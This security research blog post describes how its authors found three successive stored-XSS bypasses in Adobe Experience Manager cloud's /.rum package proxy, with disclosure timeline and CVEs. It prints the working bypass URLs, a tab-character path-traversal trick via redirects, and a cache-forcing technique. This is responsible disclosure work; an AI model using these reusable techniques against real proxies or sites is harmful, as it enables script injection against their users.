How we got persistent XSS on every AEM cloud site, thrice

July 1, 2025

How we got persistent XSS on every AEM cloud site, thrice

Adobe Experience Manager is marketed as an ‘enterprise grade’ CMS and is one of the most popular CMSes among large companies. If you visit the landing page of a large corporate site, chances are it may be running AEM under the hood. AEM started as a standalone, self hosted application, but in recent years Adobe has been pushing its cloud offering which comes with inbuilt CDN and security features.

While doing bug bounty on a site running on AEM, we noticed that the site was loading some Javascript from the route `/.rum/@adobe/helix-rum-js@%5E2/dist/rum-standalone.js` . Further digging indicated that the `/.rum` path was handled by Adobe’s cloud-specific CDN configuration, and appeared to be proxying directly to an NPM package host. Our interest was piqued, as NPM packages can contain HTML files that may allow for an XSS.

The blog recounts the story of how we were able to exploit this proxy to achieve a stored XSS in every AEM cloud site not once, not twice, but three times; and a little-known technique we used along the way which you may be able to use in your own research.

Setting the Stage

RUM stands for ‘real user monitoring’ and is a standard way of tracking users’ experience with an AEM cloud site. RUM tracks mouse movements, page load times, and other useful metrics for a certain sample set of users and collects them at the `/.rum` endpoint. The data collected is well documented in Adobe’s page on Operational Telemetry.

The `/.rum` path does not even touch the AEM application at all – it is handled by a Javascript worker within the `fastly@edge` platform, which Adobe leverages for its CDN features. Luckily for us, the source code of the RUM collector is freely available on Github at the `helix-rum-collector` repository.

After reviewing the code, we understood that the `/.rum` proxy roughly worked as follows:

  • First, the code would check that the path started with either `/.rum/web-vitals` or `/.rum/@adobe/helix-rum`, and if not, would abort with an error. This is intended to only allow access to three packages; `web-vitals`, `@adobe/helix-rum-js`, and `@adobe/helix-rum-enhancer`.
  • Then, the code would choose one of JSDelivr and Unpkg at random, which both host NPM packages.
  • The code would then strip the `/.rum` prefix from the path, and use `fetch` to fetch the content from either JSDelivr or Unpkg. The code also proxies all the response headers back.

Since the code proxies all headers, including the `Content-Type`, the first thing for us to check before even thinking about mounting an XSS attack is whether either NPM package CDN allows serving files with a scriptable mime type. We started with the most obvious solution, uploading a package containing an HTML file. While JSDelivr served this as `text/plain`, Unpkg happily served it as `text/html` and executed an alert. Having determined that serving a malicious XSS payload was at least possible (in theory), our attention turned to attacking the logic used to whitelist packages in the proxy.

First Blood

Both NPM CDNs in use have the same underlying path structure to access files – `/package/filepath` for standalone NPM packages, and `/@organisation/package/filepath` for packages under an organisation. Under this scheme, checking the prefix of the path being proxied seems like a strong protection. However, we began to look closer at the exact checks being done on the path, which reads as follows:

  const { pathname } = new URL(req.url);

  // Reject double-encoded URLs (which contain %25 as that is the percent sign)
  // Also reject paths that contain '..' but decode the URL first as it might be encoded
  if (pathname.includes('%25') || decodeURI(pathname).includes('..')
    || pathname.includes('%3A') || decodeURI(pathname).includes(':')) {
    return respondError('Invalid path', 400, undefined, req);
  }

  try {
    // .. snip ..

    const isDirList = (pathname.endsWith('/'));
    if (req.method === 'GET' && pathname.startsWith('/.rum/web-vitals')) {
      if (isDirList) {
        return respondError('Directory listing is not allowed', 404, undefined, req);
      }
      return respondPackage(req);
    }
    if (req.method === 'GET' && pathname.startsWith('/.rum/@adobe/helix-rum')) {
      if (isDirList) {
        return respondError('Directory listing is not allowed', 404, undefined, req);
      }
      return respondPackage(req);
    }
  }

Clearly some thought has been put into security here. By checking for `..` in the decoded URI, the code kills any trivial traversal-based bypasses like `/.rum/web-vitals/%2E%2E/our-package/x.html` . However, the code has a quite funny and simple bypass that allows us to proxy to our own package; can you see it?

The check `pathname.startsWith(‘/.rum/web-vitals’)` is missing a trailing slash, meaning that the proxy allows packages like `web-vitals-malicious`! Seeing this, we blessed the world with the `web-vitalsxyz` package, which contains a single file `demo.html` with an XSS payload. Visiting `https://our.target.site/.rum/web-vitalsxyz/demo.html` then popped our payload, and we had achieved XSS on every AEM cloud website! With over 45,000 sites running on AEM cloud, the impact of this simple bug was incredibly widespread.

Because the proxy distributes requests between JSDelivr and Unpkg at random, at first we thought the XSS would only have a 50% chance of working on any given page load. However, it turns out the CDN responses are cached with a long expiry. Therefore, once we get a single request that is delivered to Unpkg and fires an XSS, that request will fire an XSS 100% of the time. To prevent the cache server from caching the benign JSDelivr response, we discovered that Unpkg (but not JSDelivr) was case insensitive. Therefore we modified our payload to `https://our.target.site/.rum/web-vitalsxyz/DEMO.html`, which does the following:

  • If JSDelivr responds, it will fail to find the file and result in a 404; this will not be cached.
  • If Unpkg responds, due to the case insensitive file behavior it will find the file and result in a 200; the response will be cached.

We reported the bug to Adobe and called it a day.

Second Blood

We woke up five days later to the news that the XSS had been fixed. And indeed, testing our payload on a few sites, it no longer appeared to work. Browsing to the repo we quickly found the pull request that fixed the bug. The diff was as follows:

-   if (req.method === 'GET' && pathname.startsWith('/.rum/web-vitals')) {
+   if (req.method === 'GET' && pathname.match(/^\/\.rum\/web-vitals[@/]/)) {

The code now appears secure. The regex match ensures that `web-vitals` is either succeeded by a `/`, or `@` which is used to specify a version (such as `web-vitals@1.0.0`). It’s natural to ask at this point as well whether an NPM package can contain the `@` symbol, and we asked this question too, but alas it is not an allowed character. We seem to be at a dead end. There is no similar check added for the `/.rum/@adobe/helix-rum` path, but of course we are not a member of the `@adobe` organisation so we can’t publish packages under that namespace.

At this point, we were forced to look to other parts of the code to see whether anything else looked exploitable. We looked at the code actually responsible for fetching the file from Unpkg, which looked like this:

const redirectHeaders = [301, 302, 307, 308];
const rangeChars = ['^', '~'];

export async function respondUnpkg(req) {
  const url = new URL(req.url);
  const paths = url.pathname.split('/');
  const beurl = new URL(paths.slice(2).join('/'), 'https://unpkg.com');
  const bereq = new Request(beurl.href);
  const beresp = await fetch(bereq, {
    backend: 'unpkg.com',
  });

  // .. snip ..

  if (redirectHeaders.includes(beresp.status)) {
    const bereq2 = new Request(new URL(beresp.headers.get('location'), 'https://unpkg.com'));
    const err2 = prohibitDirectoryRequest(bereq2);
    if (err2) {
      return cleanupResponse(err2);
    }
    const beresp2 = await fetch(bereq2, {
      backend: 'unpkg.com',
    });

    if (redirectHeaders.includes(beresp2.status)) {
      const bereq3 = new Request(new URL(beresp2.headers.get('location'), 'https://unpkg.com'));
      const err3 = prohibitDirectoryRequest(bereq3);
      if (err3) {
        return cleanupResponse(err3);
      }

      const beresp3 = await fetch(bereq3, {
        backend: 'unpkg.com',
      });

      return cleanupResponse(beresp3, req, ccMap);
    }
    return cleanupResponse(beresp2, req, ccMap);
  }
  return cleanupResponse(beresp, req, ccMap);
}

The code is implementing a primitive redirect-following system, where it will follow redirects from the CDN up to two times. If you are familiar with web development, this code might seem strange, as `fetch` follows redirects by default and the `backend` parameter is not part of NodeJS nor the web standard. However, you have to remember that this is running in a Fastly edge worker, which has a nonstandard option for it, and indeed the Fastly fetch function too does not follow redirects by default

This redirect following behavior gives us a lot of options that we would not have otherwise; there is a lot of ways to coerce Unpkg into giving us a redirect. For example, if we visit an Unpkg URL without a version specified, it will URL decode the path once and redirect it to the package but with the version pinned to the latest available. We can verify this via curl:

sh$ curl 'https://unpkg.com/web-vitals/foo-%2562ar' -v
* Request completely sent off
< HTTP/2 302 
< date: Mon, 30 Jun 2025 00:45:49 GMT
< content-type: text/plain;charset=UTF-8
< content-length: 42
< location: /web-vitals@5.0.3/foo-%62ar
< access-control-allow-origin: *
< cache-control: public, max-age=60, s-maxage=300
< cross-origin-resource-policy: cross-origin
< strict-transport-security: max-age=31536000; includeSubDomains; preload
< x-content-type-options: nosniff
< server: cloudflare
< cf-ray: 9579a49f69d229b3-MEL
< alt-svc: h3=":443"; ma=86400

In our case, it redirects `/web-vitals/foo-%2562ar` to `/web-vitals@5.0.3/foo-%62ar`, which involves adding a version and URL decoding once. It is natural to ask then whether a payload like `/web-vitals/%252e%252e/web-vitalsxyz/demo.html` would work – the redirect happens, the path gets URL decoded once and becomes `%2e2e`, and we traverse outside the whitelisted directory. However, the proxy code does include this check:

  // Reject double-encoded URLs (which contain %25 as that is the percent sign)
  // Also reject paths that contain '..' but decode the URL first as it might be encoded
  if (pathname.includes('%25') || decodeURI(pathname).includes('..')
    || pathname.includes('%3A') || decodeURI(pathname).includes(':')) {
    return respondError('Invalid path', 400, undefined, req);
  }

Which blocks `%25` and renders this effort unfruitful.

However, the idea itself of creating a traversal after a redirect was still interesting to us. After exhausting the obvious approaches, we decided to look at the NodeJS source code for the `fetch` function to see how it handles path normalisation. Our idea was that there would be some path that doesn’t contain `..` but still results in a parent traversal. And indeed, after having a look, we found something very interesting in the Ada URL parser library, which is used by NodeJS since version 18:

template 
result_type parse_url_impl(std::string_view user_input,
                           const result_type* base_url) {
  // .. snip ..

  if (unicode::has_tabs_or_newline(user_input)) [[unlikely]] {
    tmp_buffer = user_input;
    // Optimization opportunity: Instead of copying and then pruning, we could
    // just directly build the string from user_input.
    helpers::remove_ascii_tab_or_newline(tmp_buffer);
    url_data = tmp_buffer;
  } else [[likely]] {
    url_data = user_input;
  }

  // .. snip ..
}

ada_really_inline void remove_ascii_tab_or_newline(
    std::string& input) noexcept {
  // if this ever becomes a performance issue, we could use an approach similar
  // to has_tabs_or_newline
  std::erase_if(input, ada::unicode::is_ascii_tab_or_newline);
}

ada_really_inline constexpr bool is_ascii_tab_or_newline(
    const char c) noexcept {
  return c == '\t' || c == '\n' || c == '\r';
}

For those of you that don’t speak C++, what this means is that **any URL passed to `fetch` will have newlines and tabs removed before fetching!** You can actually verify this for yourself right now – simply write `fetch(“https://exam\tple.com/”)` into your browser console and observe that it fetches from `example.com` . It turns out that this behavior is actually mandated by the WHATWG URL parsing standard, so this behavior is common across most, if not all URL parsers.

This allow us to supply the following URL:

https://our.target.site/.rum/web-vitals/.%09./web-vitalsxyz/DEMO.html

What occurs here is as follows:

  • First, the proxy passes this URL directly to Unpkg minus the `/.rum` prefix; it will see it as the package `web-vitals`, with the path `/.%09./web-vitalsxyz/DEMO.html`.
  • Since we did not specify a package version, it will URL decode once and send a redirect. This will mean a `Location` header of `/web-vitals@5.0.3/.\t./web-vitalsxyz/DEMO.html`, where `\t` is a literal tab character.
  • This `Location` header will be parsed again by the proxy; it will remove the literal tab character according to the WHATWG standard, and see that the resulting URL `/web-vitals@5.0.3/../web-vitalsxyz/DEMO.html` contains a path traversal. It will therefore normalise it to just `/web-vitalsxyz/DEMO.html`.
  • Passing this new URL to Unpkg will read from our malicious package and result in XSS.

With this new technique, we achieve a new universal XSS on all AEM cloud websites. We reported this new vector to Adobe.

Third Blood

About a week after reporting, we woke up to another pull request and round of fixes, located here. This time, the validation logic had been changed to reject encoded characters with the exception of `%5e`:

-  // Reject double-encoded URLs (which contain %25 as that is the percent sign)
-  // Also reject paths that contain '..' but decode the URL first as it might be encoded
-  if (pathname.includes('%25') || decodeURI(pathname).includes('..')
-    || pathname.includes('%3A') || decodeURI(pathname).includes(':')) {
+  // Reject all encoded characters except %5E (^) when used for semantic versioning
+  // i.e. allow patterns like @package@%5E2.0.0 but reject any other % encoding
+  const validVersionPattern = /%5[Ee](?:\d|$)/;
+  const hasInvalidEncoding = pathname.includes('%')
+    && !pathname.split('/').every((segment) => !segment.includes('%') || validVersionPattern.test(segment));
+
+  if (hasInvalidEncoding || decodeURI(pathname).includes('..') || decodeURI(pathname).includes(':')) {
    return respondError('Invalid path', 400, undefined, req);
  }

… or at least, that seemed to be the intent of the commit. Looking at it more closely, the logic of the code specifies that for any particular segment (delimited by `/`), if it contains a `%` it must contain a `%5e`. This has the side effect of allowing any encoded character in a segment, as long as it contains `%5e`.

This is pretty simple to bypass, and we came up with the following payload:

https://our.target.site/.rum/web-vitals/.%09.%2fweb-vitalsxyz%2fDEMO.html%3f%5e

This satisfies all the requirements of the code checker, as the segment `.%09.%2fweb-vitalsxyz%2fDEMO.html%3f%5e` contains `%5e`. However, when it is decoded, the `%3f%5e` will simply become `?^`, which is a query string parameter that is ignored. After validating this XSS, we reported this third and final bypass to Adobe.

The End

The three vulnerabilities were grouped into two assigned CVEs, CVE-2025-47114 and CVE-2025-47115. No action is required; the fixes were applied to all of Adobe’s cloud customers. The validation logic as of today looks as follows:

  // Reject all encoded characters except %5E (^) when used for semantic versioning
  // i.e. allow patterns like @package@%5E2.0.0 but reject any other % encoding
  const validVersionPattern = /%5[Ee](?:\d|$)/;

  const hasInvalidEncoding = pathname.includes('%')
    && !pathname
      .split('/')
      .every((segment) => !segment.includes('%')
        || (segment.match(/%/g).length === 1 // exactly one % sign is allowed
          && validVersionPattern.test(segment))); // and only if it's the ^ character

  if (hasInvalidEncoding || decodeURI(pathname).includes('..') || decodeURI(pathname).includes(':')) {
    return respondError('Invalid path', 400, undefined, req);
  }

This enforces that for every URL segment, the only allowed encoded character is `%5e`. This is incredibly effective and kills any ideas we may have. We were not able to find any other bypasses, but if you can find a bypass, you too can have an XSS in all of AEM cloud! =)

Applications today are increasingly complicated. Usually it’s not just the application itself being hosted on a domain, but layers and layers of proxies, caching, CDNs, and other features too. These extra features are convenient for developers but open up a huge attack surface that is often overlooked. This is not the first, nor will it be the last vulnerability caused by the CDN layer.

Timeline

  • Apr 25 2025: Reported the first XSS to Adobe.
  • Apr 30 2025: First XSS fixed by Adobe.
  • May 15 2025: Reported the second XSS to Adobe.
  • May 22 2025: Second XSS fixed by Adobe.
  • May 23 2025: Reported the third XSS to Adobe.
  • Jun 10 2025: Third XSS fixed by Adobe.

About Assetnote

Searchlight Cyber’s ASM solution, Assetnote, provides industry-leading attack surface management and adversarial exposure validation solutions, helping organizations identify and remediate security vulnerabilities before they can be exploited. Customers receive security alerts and recommended mitigations simultaneously with any disclosures made to third-party vendors. Visit our attack surface management page to learn more about out platform and the research we do.

in this article

Book your demo: Identify cyber
threats earlier– before they
impact your business

Searchlight Cyber is used by security professionals and leading investigators to surface criminal activity and protect businesses. Book your demo to find out how Searchlight can:

Enhance your security with advanced automated dark web monitoring and investigation tools

Continuously monitor for threats, including ransomware groups targeting your organization

Prevent costly cyber incidents and meet cybersecurity compliance requirements and regulations

Fill in the form to get you demo